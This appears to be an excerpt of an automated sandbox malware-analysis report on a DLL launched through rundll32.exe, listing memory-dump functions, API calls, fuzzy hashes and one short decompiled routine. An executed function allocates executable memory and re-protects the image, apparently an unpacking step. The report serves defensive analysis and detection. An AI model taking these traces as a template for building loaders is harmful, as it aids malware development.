Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction ID: 11ed2e06494746cad1f0524cea18405a93ba614d5b12e7c57329dac7e4d6a8ec
Opcode Fuzzy Hash: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction Fuzzy Hash: C211EC328042298BCF04CFA5C854EEE77B5AF81358F26040DE601AB390DF30EE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480DDA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480DEB
std::_Facet_Register.LIBCPMT ref: 6D480E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480E5C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480E7A

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction ID: 78d17f2754967a5607c9d52cba2232b9a4f0e6a02ab3608d9c84952614b99449
Opcode Fuzzy Hash: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction Fuzzy Hash: E8119A7290422A9BCF15DBA5C884EFE7775AF85794F26040DE611AB390DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CC38, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CC49
std::_Facet_Register.LIBCPMT ref: 6D48CC9A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CCBA
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CCD8

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction ID: c3ad9c35b194fccf1a0c64262b013db24cb39f7004ce579877582aee004c65bd
Opcode Fuzzy Hash: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction Fuzzy Hash: 0A11A0329041298BCF04DBA5C840EFE7775AF85354F26050ED610AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CCDE, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CCEF
std::_Facet_Register.LIBCPMT ref: 6D48CD40
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CD60
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CD7E

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction ID: 44f282b8ddae375fc04f14845d1e7b67e1298913ab9a58ad5f1460d4373d4e79
Opcode Fuzzy Hash: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction Fuzzy Hash: 2911A0328041598BCF14DBA5C840EEE7BB5BF85754F26051DD6116B2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480C8E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480C9F
std::_Facet_Register.LIBCPMT ref: 6D480CF0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480D10
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480D2E

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction ID: 3fcc104816214e690e977a3a015f63bbb5b5160fb19c4fa7cf3cf6e133f50979
Opcode Fuzzy Hash: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction Fuzzy Hash: 8A11AC328041698BCF05DFA6C884EEE77B5AF84354F26440EE615AB290DF34EE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48075E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48076F
std::_Facet_Register.LIBCPMT ref: 6D4807C0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4807E0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4807FE

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction ID: 177bcea6f51a6758e95a3f8c7eabc97e9f89100572e05defd5642680c2618e72
Opcode Fuzzy Hash: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction Fuzzy Hash: 7D119A36C042298BCF05DBA6C880EEE7775AF85764F26041DD611AB2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480F26, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480F37
std::_Facet_Register.LIBCPMT ref: 6D480F88
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480FA8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480FC6

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction ID: 5f9de9f948c43be1c1318fee31d502832e5cb35c9637a851bcae922b45bd7756
Opcode Fuzzy Hash: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction Fuzzy Hash: 72119E329042199BCF05DF66C840EEE7776BF84754F26440DE614AB291DFB4DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480FCC, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480FDD
std::_Facet_Register.LIBCPMT ref: 6D48102E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48104E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48106C

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction ID: 89bf6edb30f7e89e9c9809681f86f3c138b17145cd3dd8c42011dc5e0c1290b0
Opcode Fuzzy Hash: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction Fuzzy Hash: 25118C329042598BCF15DBA4C884EEE7775BF85394F26040ED621AB291DF349E018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CED0, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CEE1
std::_Facet_Register.LIBCPMT ref: 6D48CF32
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CF52
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CF70

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction ID: a833da3f418ed1dc61409a7b590e3b8ceabe871af1ddbfb45da1472c377a8001
Opcode Fuzzy Hash: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction Fuzzy Hash: E011AC328041299BCF05DFA5C840EEE7B75AF84764F26450EE614AB391DF74EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480950, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480961
std::_Facet_Register.LIBCPMT ref: 6D4809B2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4809D2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4809F0

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction ID: 79edab8c93175075049ccbc22e27aaddad4a8d8bf4e9fd0dc66c7a30cde1445d
Opcode Fuzzy Hash: 1c4b3b0079c801e8f752b3533dfc2b96c00f99121712f5056ef7ee56d41829e6
Instruction Fuzzy Hash: E011AC72805129CBCF15DFA5C854EEE7775AF85358F26040DE614AB290DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B9F2, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BA03
std::_Facet_Register.LIBCPMT ref: 6D47BA54
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BA74
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BA92

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction ID: 138878d2f34deaac6d5ac750ce45965dff2197b52e02461f7c5820766d997cd0
Opcode Fuzzy Hash: 06c5598a1ec4d2f6a88b411284251f4f0bd3ed5cea521f75f0154c9349ecb09e
Instruction Fuzzy Hash: 0F119A36C082298BCF25DBA4C884EEE77B5AF85324F26040DD615AB290DF349E05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481072, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481083
std::_Facet_Register.LIBCPMT ref: 6D4810D4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4810F4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D481112

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction ID: 97326177e85ec5436a9785dfc038d60680295897353fa403b150e812f36207e0
Opcode Fuzzy Hash: 26992ec900c6af6431f90c684b5185d235607b38d89f3e9a6f5f9d63bd7d840f
Instruction Fuzzy Hash: 1B11A0329041698BCF15DB65C840EEE7775AF85358F26440EE611AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480804, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480815
std::_Facet_Register.LIBCPMT ref: 6D480866
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480886
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4808A4

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction ID: 501574e1bb70185e12b83917f32164f2108c4853dd2509aec750a55c50116b95
Opcode Fuzzy Hash: a6ac0704de2ffff93f32760c82f43bec27da4b41f57f307f280d5a49852a324c
Instruction Fuzzy Hash: 7311EC32C042298BCF19DFA1D844EEE7B75AF85394F26040DE610AB290DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4808AA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4808BB
std::_Facet_Register.LIBCPMT ref: 6D48090C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48092C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48094A

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction ID: b549fafeacd3f6e5dae217e54e72226aeb4e8f047809c4f45a83c76aeb2e0ffc
Opcode Fuzzy Hash: d3fcd1ffd85ac70160853d09c29c7d27365912011cb1fad83fe3c705da0cbaf0
Instruction Fuzzy Hash: 5011AC3280412A8BCF15DFA6C840EEE77B5AF85364F26040DD610AB2A1DF74EE01DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BA98, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BAA9
std::_Facet_Register.LIBCPMT ref: 6D47BAFA
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BB1A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BB38

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction ID: edf9d1510de5de9a4b89afd188f08ec27bcbe927fa6e0934a101447e8da26bcd
Opcode Fuzzy Hash: ea560127e98e9fd7dc876ce4c52410c7a16ca128f0323e6ddd848438d01d4a91
Instruction Fuzzy Hash: 88119A729042298BCF25DBA5C844EEE7775AF85328F26440DDA10AB390DF749E01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C45E6, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58), ref: 6D4C4618
GetLastError.KERNEL32(?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000,00000364,?,6D4BDF29), ref: 6D4C4624
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4C458D,?,00000000,00000000,00000000,?,6D4C4924,00000006,6D507C58,6D507C50,6D507C58,00000000), ref: 6D4C4632

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction ID: bd82ea86bdca110e910f3701ce1c0883a881a8a9b646d3c04cbb85fb896ebdc8
Opcode Fuzzy Hash: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction Fuzzy Hash: D501D43A755223ABCF114E7DCE44E567BA8AB0ABF17260225F919D3244DB24EC01CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6D451850, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D451850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x6d454130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d45413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x6d45412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6d454128 = _t5;
						 *0x6d454130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6d454124 = _t6;
						if(_t6 == 0) {
							 *0x6d454124 =  *0x6d454124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D45164B,73B763F0), ref: 6D45185F
GetVersion.KERNEL32 ref: 6D45186E
GetCurrentProcessId.KERNEL32 ref: 6D451885
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D45189E

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 661b8b9ddb5be227407c84281b5efd5bfea619f47dec4dccfdbb6bd9c28920b4
Instruction ID: f7f5b4730bdfb0240792bb662fa1630a16f257b39744639ee865d043355938c0
Opcode Fuzzy Hash: 661b8b9ddb5be227407c84281b5efd5bfea619f47dec4dccfdbb6bd9c28920b4
Instruction Fuzzy Hash: F5F018716543119AEF50BF796C0DB943BB4E71FBA1F204355E589D92C8D370CC618B58

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7C1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4B7CAD

Strings

pow, xrefs: 6D4B7C85, 6D4B7CA2

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction ID: 771380e0f8fc9e27472e3a77cf89ef2e8e80128af332eeb17585f8d318386dda
Opcode Fuzzy Hash: d17adadd0a26647ba0e0a55b029b82124a75908f5c8a7dbc1a19f7938b4c5fd6
Instruction Fuzzy Hash: 42514765E1C703A7CB02BB24C990F7A3BB4AB51741F31C95CE0A542398EB358C959E97

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD324, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6D4CD5C5,?,00000050,?,?,?,?,?), ref: 6D4CD3FF

Strings

OCP, xrefs: 6D4CD378
ACP, xrefs: 6D4CD342

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction ID: ee540e570f7a97e85225db797f073506710b60ffbbefc2c32ddc35384966cf5b
Opcode Fuzzy Hash: cf42f35e55068924c36078a873cb45939cbee6843f4b06b9dff94ce57f714b9e
Instruction Fuzzy Hash: B121C46A694106A6E714DE58CD00FDB73AAFBC5B50F678464EA09D7310F732ED01C356

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C22D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C2348

Strings

HTm, xrefs: 6D4C2315
DTm, xrefs: 6D4C2303

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free
String ID: DTm$HTm
API String ID: 269201875-2435632002
Opcode ID: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction ID: af1f8f997447600e55b5ebc96017d885417481b4998f513798888fbb771f9472
Opcode Fuzzy Hash: 9c45274a6e8af62c446f1d1fcc86b5b3bff65d297180ef8683444ca852aa02eb
Instruction Fuzzy Hash: 2D11B4791083029FE770CF3DD480F5677E8EB167A8B30942EE5998B651DBB19C4187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5F71, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 6D4C6007
GetLastError.KERNEL32 ref: 6D4C6015
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6D4C6070

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction ID: 61d72aef1f7ea1925916033413172f8c401f68437eba1a38f4e8ca5d94da0ca8
Opcode Fuzzy Hash: d6dd633b63b2fe89919789d9cf623f97647acc3686a301fab28e76bd238b15a2
Instruction Fuzzy Hash: 0B41E739604216AFDB11CF6AC844F7A7BB5EF03314F21C25DE958672A1DB318D42C7A2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6516 Parent PID: 6444 rundll32.exeCOMMON

Executed Functions

Function 6D541746, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000727,00003000,00000040,00000727,6D5411A0), ref: 6D541803
VirtualAlloc.KERNEL32(00000000,00000269,00003000,00000040,6D5411FF), ref: 6D54183A
VirtualAlloc.KERNEL32(00000000,0000FDA6,00003000,00000040), ref: 6D54189A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D5418D0
VirtualProtect.KERNEL32(6D450000,00000000,00000004,6D541725), ref: 6D5419D5
VirtualProtect.KERNEL32(6D450000,00001000,00000004,6D541725), ref: 6D5419FC
VirtualProtect.KERNEL32(00000000,?,00000002,6D541725), ref: 6D541AC9
VirtualProtect.KERNEL32(00000000,?,00000002,6D541725,?), ref: 6D541B1F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D541B3B

Memory Dump Source

Source File: 00000004.00000002.908629086.000000006D541000.00000040.00020000.sdmp, Offset: 6D541000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 51fdc63658de21ca3e7fc03ac4ccf3f5394230b99318a8f87d8b36649fad153b
Instruction ID: f7a2219c029a6e30627772013bc5bffe79b596495374d6d89080f693d5f975b7
Opcode Fuzzy Hash: 51fdc63658de21ca3e7fc03ac4ccf3f5394230b99318a8f87d8b36649fad153b
Instruction Fuzzy Hash: 75D17DB2600241AFDB25CF54C880F5177B6FF88310B198696ED499FA9AD77CBC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF58C, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4BF5CD

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction ID: d7c3b021a5854b0cad3682e518e2aa0937773d0542cd68e65697bf0651ad2ccd
Opcode Fuzzy Hash: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction Fuzzy Hash: 02F0243D65F126A7EB015E2A8C04F1A3798AF717B0B228016EC1CD6281DF31EC0186F0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4773C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 6D4773E8

Part of subcall function 6D478A3D: std::_Lockit::_Lockit.LIBCPMT ref: 6D478A4F
Part of subcall function 6D478A3D: std::locale::_Setgloballocale.LIBCPMT ref: 6D478A6A
Part of subcall function 6D478A3D: _Yarn.LIBCPMT ref: 6D478A80
Part of subcall function 6D478A3D: std::_Lockit::~_Lockit.LIBCPMT ref: 6D478AC0

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 238635018-0
Opcode ID: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction ID: 0ea63edf627e76353725df574c67782d1d9c5ad45ce826082993449d712a0eb9
Opcode Fuzzy Hash: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction Fuzzy Hash: A7E0DF32E0D622CBD3309B6A8001FACAB81AB40B94FA2001ED7009F680CBB44C4087D2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4CDE61, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDEB6
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDEC3

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D4CDF6D
IsValidCodePage.KERNEL32(00000000), ref: 6D4CDFC8
IsValidLocale.KERNEL32(?,00000001), ref: 6D4CDFD7
GetLocaleInfoW.KERNEL32(?,00001001,.Km,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6D4CE01F
GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 6D4CE03E

Strings

.Km, xrefs: 6D4CDE8A, 6D4CDE9A, 6D4CDF5A, 6D4CDEFC, 6D4CDEF1, 6D4CDEF4, 6D4CDEFF, 6D4CDF5D
.Km, xrefs: 6D4CDF96, 6D4CDF38, 6D4CDF43
.Km, xrefs: 6D4CDE77, 6D4CE016

Memory Dump Source

Source File: 00000004.00000002.908424764.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: .Km$.Km$.Km
API String ID: 745075371-3451765847
Opcode ID: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction ID: bbdfc5cfcde2771bc8d938c49f6fc1a364fff38656180e8b4437088aabd462c6
Opcode Fuzzy Hash: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction Fuzzy Hash: BB51717AA446069BEF10DFA5CC44FBE77B8BF95700F11456AE914E7240E7709D01CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD50B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

